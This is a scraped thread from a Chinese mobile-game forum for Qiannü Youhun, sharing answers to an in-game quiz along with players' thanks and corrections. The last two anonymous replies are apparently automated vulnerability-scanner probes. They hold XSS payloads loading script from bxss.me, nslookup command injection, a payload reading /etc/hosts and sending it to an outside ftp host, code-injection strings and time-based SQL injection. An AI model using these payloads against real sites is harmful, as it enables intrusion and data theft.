倩女幽魂手机游戏官网论坛

标题: 【工具百宝箱】保灵丹答案,妈妈再也不用担心我升级比别人慢了 [打印本页]

作者: 小弦落音    时间: 2016-3-11 22:40
标题: 【工具百宝箱】保灵丹答案,妈妈再也不用担心我升级比别人慢了

手机APP小伙伴请直接看答案哦~
点击人物头像——>角色积分——>关宁积分兑换,每天可购买两个逆流瓶
总计每天可以使用三个保灵丹~等级越高获得的经验越多哦
每天都要记得吃满三个哦~快速升级的妙招一般人我不告诉他!

倩女【工具百宝箱】保灵丹答案大搜罗

在此输入关键字即可搜索          
类别 题目 答案
保灵丹出战灵兽死亡后,多少秒自动满血复活?15秒
保灵丹地上捡起一件装备穿上后将会?绑定
保灵丹多少级以前不能PK?30
保灵丹商城内,净瓶道具在灵玉商城中卖?1灵玉
保灵丹灵兽若被放生,则:再也见不到了
保灵丹PK值为多少时主角名字颜色为红色大于60
保灵丹你获得了一只力量型灵兽,则以下说法错误的是寿命较高
保灵丹在游戏中,一位50级玩家,打多少级的怪物,获得的经验会有一定程度的衰减?81
保灵丹哪个npc处可进行强化转移操作?铁匠铺npc
保灵丹怎样才能在游戏中找到乐趣?交更多朋友
保灵丹关于灵兽死亡,以下说法错误的是死亡消失,不可被召唤
保灵丹使用吴山石提升武器基础时,以下哪个属性会提升?物理攻击和法术攻击
保灵丹多少级需要手动升级?69
保灵丹找不到NPC怎么办?点击小地图查看NPC按钮
保灵丹灵兽品质最高为
保灵丹灵兽悟性最高可达到?10
保灵丹学会了技能如何升技能等级?在技能菜单升级
保灵丹哪种货币可以在玩家之间交易?银两
保灵丹1级吴山石可以通过以下哪种途径获得?三种途径皆可
保灵丹随机属性有可能比紫装更多的是什么装备?蓝装
保灵丹如何进行装备升级?使用吴山石进行装备强化
保灵丹30级以上灵兽放生不可能获得的物品为?银两
保灵丹在灵兽界面上,可对灵兽操作的按钮不包括:打坐
保灵丹商场内,净瓶道具在元宝商场中卖13元宝
保灵丹嘿,前面的NPC好像有任务交给你!他的头上顶了个?问号
保灵丹游戏中多少级别可以加入帮会?20级
保灵丹灵兽多少级之后不再领悟技能30级

作者: 小弦落音    时间: 2016-3-11 23:20
{:10_406:}自己的沙发自己做~小伙伴们要记得每天吃三个保灵丹了啦~
作者: 小弦落音    时间: 2016-3-11 23:22
遇到百宝箱里木有的题目请小伙伴们截图补充哦~~感谢大家~!
作者: 鹿生    时间: 2016-3-11 23:26
好贴一定要回复
作者: 花柩    时间: 2016-3-11 23:31
赞赞赞╮(╯_╰)╭虽然说要是我还没答错一题,不过总要防范于未然嘛,毕竟这么多经验
作者: 小弦落音    时间: 2016-3-11 23:36
花柩 发表于 2016-3-11 23:31
赞赞赞╮(╯_╰)╭虽然说要是我还没答错一题,不过总要防范于未然嘛,毕竟这么多经验

新玩家还不太了解游戏就容易悲剧吖
作者: 小弦落音    时间: 2016-3-12 00:46
新的一天又该吃丹啦
作者: 桔子妹。    时间: 2016-3-12 07:23
灵兽死亡后多久会自动满血复活  15秒……
作者: 抓到一只莫莫    时间: 2016-3-12 08:55
收藏~~等答题的时候来看看~
作者: 静静    时间: 2016-3-12 09:49
暖贴 好厉害
作者: 微与慕嗣音丶    时间: 2016-3-12 09:54
暖贴~这里新人表示昨天还答错了一个~
作者: 小弦落音    时间: 2016-3-12 10:09
桔子妹。 发表于 2016-3-12 07:23

谢谢桔子补充,棒棒哒
作者: 小涛哥    时间: 2016-3-12 10:39
宝灵丹经验杠杠的。。
作者: 小涛哥    时间: 2016-3-12 15:57
小弦落音 发表于 2016-3-12 10:09
谢谢桔子补充,棒棒哒

出战灵兽死亡后,多少秒自动满血复活?答:15秒
作者: 小弦落音    时间: 2016-3-12 17:25
小涛哥 发表于 2016-3-12 15:57
出战灵兽死亡后,多少秒自动满血复活?答:15秒

已经增加词条~谢谢小涛哥
作者: 紫衣惹轻歌    时间: 2016-3-12 21:26
好帖子 打包走
作者: 未羽。    时间: 2016-3-13 00:08
纠正错误。2个多少级以前不能PK!!!!
作者: 小弦落音    时间: 2016-3-13 22:53
未羽。 发表于 2016-3-13 00:08
纠正错误。2个多少级以前不能PK!!!!

哈哈小伙伴火眼金睛~
作者: 青笺画卿颜    时间: 2016-3-13 23:23
可怜我还木有激活码
作者: 三寸天堂    时间: 2016-3-13 23:38
你的头像好可爱,我也木有激活码
作者: 做你的天子╮    时间: 2016-3-14 12:20
灵兽多少级不在领悟技能   30
作者: 小弦落音    时间: 2016-3-14 12:42
做你的天子╮ 发表于 2016-3-14 12:20
灵兽多少级不在领悟技能   30

{:10_420:}谢谢小伙伴补充哦~~么么哒
作者: 坟上青烟    时间: 2016-3-15 07:54
我会说直接问倩女精灵就行了!
作者: 卿沐醉    时间: 2016-3-15 10:19
不让我发帖,我就问一句,什么时间出同职业男女角色,难道非要选人妖么
作者: zi珏    时间: 2016-3-15 17:59
好东东 比自己网页搜索 靠谱方便多了
作者: 微与慕嗣音丶    时间: 2016-3-15 18:03
唔,,,建议再开一个专栏,把这些攻略都放一起吧_(:_」∠)_一不小心就沉下去了
作者: 小弦落音    时间: 2016-3-15 18:04
微与慕嗣音丶 发表于 2016-3-15 18:03
唔,,,建议再开一个专栏,把这些攻略都放一起吧_(:_」∠)_一不小心就沉下去了

{:10_420:}嗯好吖~我去做个模板~放在一起
作者: 微与慕嗣音丶    时间: 2016-3-15 18:28
小弦棒棒哒~(=^▽^=)
作者: 抓到一只莫莫    时间: 2016-3-16 21:22
灵兽品质最高为。。。这个题目我答了两次都选的神兽它告诉我错的,应该是甲!到底哪个是对的啊!!!!!我的经验啊
作者: 小弦落音    时间: 2016-3-16 21:28
抓到一只莫莫 发表于 2016-3-16 21:22
灵兽品质最高为。。。这个题目我答了两次都选的神兽它告诉我错的,应该是甲!到底哪个是对的啊!!!!!我 ...

{:10_246:}我要检讨,是我答案错了,确实是甲!谢谢小伙伴指出
作者: 抓到一只莫莫    时间: 2016-3-17 08:23
小弦落音 发表于 2016-3-16 21:28
我要检讨,是我答案错了,确实是甲!谢谢小伙伴指出

我的经验
作者: 吃鱼的大猫    时间: 2016-3-17 18:10
作者: 苦苦的甜十    时间: 2016-3-17 18:13
作者: 雾以泪聚    时间: 2016-3-17 18:15
作者: 小弦落音    时间: 2016-3-17 18:43
苦苦的甜十 发表于 2016-3-17 18:13
我是不是很笨啊

玩了一段时间之后题目就都会了啦~~楼楼莫担心
作者: 小弦落音    时间: 2016-3-17 18:44
雾以泪聚 发表于 2016-3-17 18:15
还行啊    玩起来不错啊

{:10_409:}嘿嘿~我也觉得挺好哇
作者: 吃鱼的大猫    时间: 2016-3-21 16:23
作者: 苦苦的甜十    时间: 2016-3-21 16:27
作者: 小涛哥    时间: 2016-3-25 13:26
哪种途径不可以获得元宝?答:玩家交易
作者: 冰魂飞影    时间: 2016-4-11 11:23
就这么多题吗,应该不止吧。

作者: 枫叶骗骗    时间: 2016-4-11 11:41
这么偶收藏了~~~~~~~
作者: 小涛哥    时间: 2016-4-16 17:09
出战灵兽一旦死亡,会怎么样?
答:20秒后会自动复活
作者: 情小殇    时间: 2016-4-16 18:55
可怜元宝不能买大宝
作者: anjie    时间: 2016-4-18 17:34

作者: 风吹几把毛飘    时间: 2016-4-18 17:55
提示: 该帖被管理员或版主屏蔽
作者: 兴奋的黄瓜    时间: 2016-5-5 18:41
看看好贴一定要回复
作者: 兴奋的黄瓜    时间: 2016-5-5 18:42
作者: 我叫任晨剑    时间: 2016-5-19 07:41
赞赞赞
作者: 斗弼南波万    时间: 2016-5-19 09:22
这个可以有啊
作者: 匿名    时间: 2016-5-26 08:40
桔子妹。 发表于 2016-3-12 07:23

不是20妙吗

作者: 匿名    时间: 2016-6-13 10:48
${10000308+10000385}
20</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=007296&r=104275-173&h=104275-3d93b-2&/).slice(2),document.documentElement.appendChild(s))//'>
bcc:007296.104275-174.104275.3d93b.1@bxss.me
20'>"><script src=http://bxss.me/s?u=007296&r=104275-176&h=104275-3d93b-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,007296,104275-176,104275,3d93b,%22%5D"/>
to@example.com>
bcc:007296.104275-177.104275.3d93b.1@bxss.me
response.write(9101646*9243021)
'+response.write(9101646*9243021)+'
"+response.write(9101646*9243021)+"
set|set&set
$(nslookup dns.ce.\007296.104275-201.104275.3d93b.\1.bxss.me)
&nslookup dns.ce.\007296.104275-202.104275.3d93b.\1.bxss.me&'\"`0&nslookup dns.ce.\007296.104275-202.104275.3d93b.\1.bxss.me&`'
!(()&&!|*|*|
^(#$!@#$)(()))******
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
Http://testasp.vulnweb.com/t/fit.txt
testasp.vulnweb.com
/www.vulnweb.com
forum.php
forum.php/.
;print(md5(acunetix_wvs_security_test));
';print(md5(acunetix_wvs_security_test));$a='
";print(md5(acunetix_wvs_security_test));$a="
${@print(md5(acunetix_wvs_security_test))}
${@print(md5(acunetix_wvs_security_test))}\
http://hitt2vmL77L7h.bxss.me/
12345'"\'\");|]*{
<>
20'"()&%<acx><ScRiPt >f5I0(9236)</ScRiPt>
'"()&%<acx><ScRiPt >f5I0(9707)</ScRiPt>
作者: 匿名    时间: 2016-6-13 10:49
1困愧%2527%2522
-1 OR 2+833-833-1=0+0+0+1 --
-1 OR 3+833-833-1=0+0+0+1 --
-1 OR 2+243-243-1=0+0+0+1
-1 OR 3+243-243-1=0+0+0+1
-1' OR 2+214-214-1=0+0+0+1 --
-1' OR 3+214-214-1=0+0+0+1 --
-1' OR 2+911-911-1=0+0+0+1 or 't7cFabqK'='
-1' OR 3+911-911-1=0+0+0+1 or 't7cFabqK'='
-1" OR 2+347-347-1=0+0+0+1 --
-1" OR 3+347-347-1=0+0+0+1 --
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/
-1; waitfor delay '0:0:10' --
-1); waitfor delay '0:0:10' --
1 waitfor delay '0:0:10' --
inzTMwo0'; waitfor delay '0:0:15' --
-1;select pg_sleep(15); --

欢迎光临 倩女幽魂手机游戏官网论坛 (http://qnm.netease.com/) Powered by Discuz! X3.3